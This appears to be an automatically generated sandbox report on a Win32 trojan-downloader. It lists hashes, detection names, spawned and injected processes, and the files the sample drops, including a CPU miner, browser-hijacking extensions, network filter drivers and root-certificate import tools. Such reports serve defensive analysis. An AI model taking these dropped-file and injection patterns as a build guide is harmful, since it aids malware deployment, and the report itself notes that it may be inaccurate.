HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, SearchProtectToolbar_pcap.YR, mzpefinder_pcap_file.YR, SearchProtectToolbar.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: a106c38e961227fe401fed3e357285bc
SHA1: 0f20114e27ce4a22b68bd6b326d6033183ccfa24
SHA256: 1c17b3de2308f87d3e9cbee15e9938a8d81377195f8f4fc6030b09e7a1352046
SSDeep: 1536:RQpQ5EP0ijnRTXJz54Gc9 BUM/wAcP0lscLD8F:RQIURTXJz54GW BUM/w9if6
Size: 71112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: g3CvT78vSMa0N0LPai7QvtmUwmghB
Created at: 2009-12-06 00:50:46
Analyzed on: Windows7Ada SP1 64-bit
Summary: Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
ProtectService.exe:3580
ProtectService.exe:3668
g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884
ProtectWindowsManager.exe:3736
ProtectWindowsManager.exe:3316
import_root_cert.exe:3188
15094FED_stp.EXE:3668
cpuminer-x11opt-setup.exe:3752
DesProtetor.exe:536
wpm_v20.0.0.2227.exe:3268
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948
QQBrowser.exe:3824
QQBrowser.exe:3212
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816
powershell.exe:3772
powershell.exe:3656
powershell.exe:3376
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480
XTab_Setup2253.exe:1748
cmdshell.exe:3596
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400
amisid.exe:3516
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024
nfregdrv.exe:3588
nfregdrv.exe:3076
nfregdrv.exe:1648
nfregdrv.exe:3924
nfregdrv.exe:3192
HPNotify.exe:3640
CashReminder.exe:3984
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520
ActSys.exe:148
certutil.exe:3280
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268
amisetup2899__9664.exe:3368
GOSafer.exe:3264
WNet.exe:4016
310714_is.exe:948
The Trojan injects its code into the following process(es):
DesProtetor.exe:4032
%original file name%.exe:1512
CashReminder.exe:1108
ActSys.exe:3756
GOSafer.exe:3284
WNet.exe:3080
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutexZonesCacheCounterMutex
File activity
The process ProtectService.exe:3580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\XTab\msvcp110.dll (536 bytes)
%Program Files% (x86)\XTab\msvcr110.dll (876 bytes)
The process ProtectService.exe:3668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\XTab\CmdShell.exe (32 bytes)
The process g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\mt-core[1].js (42633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\contabilizar[1].htm (162 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\icone_cadeado[1].gif (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\verificar_ip[1].htm (105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[1] (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\i[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\top-line[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\8Hk4o[1].htm (185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\SL2[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\carregando[1].gif (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\s9[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\warning[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310113f8[1].htm (1006 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\010914i[1].htm (308 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BD.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\MobiMidia_validation[1].js (865 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\150814c[1].htm (637 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\carregando3[1].gif (1 bytes)
The process ProtectWindowsManager.exe:3736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\up[1].htm (1 bytes)
C:\ProgramData\WindowsMangerProtect\update\conf (1 bytes)
The process import_root_cert.exe:3188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\certutil.exe (90 bytes)
The process 15094FED_stp.EXE:3668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\DesProtetor\uninst.exe (1305 bytes)
%Program Files% (x86)\DesProtetor\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2A2C.tmp (74611 bytes)
%Program Files% (x86)\DesProtetor\ssleay32.dll (12088 bytes)
%Program Files% (x86)\DesProtetor\nfapi.dll (4992 bytes)
%Program Files% (x86)\DesProtetor\desprotetordrv.sys (1856 bytes)
C:\Windows\System32\drivers\desprotetordrv.sys (51 bytes)
%Program Files% (x86)\DesProtetor\libeay32.dll (35507 bytes)
%Program Files% (x86)\DesProtetor\DesProtetor.exe (15982 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\DesProtetor\ProtocolFilters.dll (9320 bytes)
The process cpuminer-x11opt-setup.exe:3752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\CPUFeatures.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\System.dll (23 bytes)
C:\Windows\System32\cpuminer-gw64.exe (41231 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll (12 bytes)
C:\Windows\System32\cpuminer-conf.json (420 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe (1279 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\UserInfo.dll (8 bytes)
The process DesProtetor.exe:536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\DesProtetor\ProtocolFilters.dll (249 bytes)
The process DesProtetor.exe:4032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[5].txt (111 bytes)
C:\Windows\Temp\P_RuleList.txt (111 bytes)
The process wpm_v20.0.0.2227.exe:3268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe (2444 bytes)
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\ActSys\asfilterdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SelfDel.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
%Program Files% (x86)\ActSys\ssleay32.dll (12088 bytes)
%Program Files% (x86)\ActSys\remove_ActSys.exe (313 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\System.dll (23 bytes)
C:\Windows\System32\drivers\asfilterdrv.sys (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\nsExec.dll (14 bytes)
%Program Files% (x86)\ActSys\ProtocolFilters.dll (38495 bytes)
%Program Files% (x86)\ActSys\ActSys.exe (15990 bytes)
%Program Files% (x86)\ActSys\libeay32.dll (35507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SimpleSC.dll (1921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscF0B5.tmp (140252 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\certutil.exe (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
%Program Files% (x86)\ActSys\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\NJaxIntermediate.cer (774 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss (4 bytes)
%Program Files% (x86)\ActSys\nfapi.dll (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\import_root_cert.exe (3406 bytes)
The process QQBrowser.exe:3824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\RegWrite.exe (86 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.2227.exe (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ChromeSync.exe (286 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\XTab_Setup2253.exe (148 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\479.db (288 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WebDataJs (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ClearnC.exe (114 bytes)
The process QQBrowser.exe:3212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\icon.png (628 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\index.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\aes.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\default_logo.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery.autocomplete.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\479.json (512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\newtab.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\xagainit.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\mostgrid.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\misc.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\settings.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\google_trends.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\common.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en-US\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\js.js (660 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pl\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\simple.css (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CH\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\preferences.js (379 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\scrollbar.bmp (37 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\addonmanager.js (531 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-TW\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\install.rdf (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\doT.min.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\hotSearch.js (6 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\googlelogo.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-LU\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-BE\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowserFrame.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\misc.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\uninstallDlg2.xml (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\stat.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\vi\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\tr\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\restoreprefs.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome.manifest (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\properties.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\ga.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (486 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\logo.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg.png (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\about_blank_hook.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery-2.1.0.min.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\popup_image_helper.js (693 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pt-BR\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\urlrequestor.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\search.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\last_tab.js (4 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\style.css (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it\locale.properties (1 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it-CH\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe (14022 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\83B.tmp (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\Thumbs.db (42 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\speed_dial.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es-419\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\loading.gif (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.xul (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\close.png (3 bytes)
%Program Files% (x86)\Mozilla Firefox\browser\searchplugins\istartsurf.xml (553 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru-MO\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\Thumbs.db (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\remoterequest.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-CN\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\81A.tmp (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\fvd.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CA\locale.properties (2 bytes)
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\WNet\ssfilterdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SimpleSC.dll (1921 bytes)
C:\Windows\System32\drivers\ssfilterdrv.sys (51 bytes)
%Program Files% (x86)\WNet\uninst.exe (2792 bytes)
%Program Files% (x86)\WNet\nfregdrv.exe (1601 bytes)
%Program Files% (x86)\WNet\ProtocolFilters.dll (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmEDE7.tmp (70570 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\WNet\ssleay32.dll (12088 bytes)
%Program Files% (x86)\WNet\WNet.exe (15606 bytes)
%Program Files% (x86)\WNet\libeay32.dll (35507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\System.dll (23 bytes)
%Program Files% (x86)\WNet\nfapi.dll (4992 bytes)
The process %original file name%.exe:1512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[2] (1 bytes)
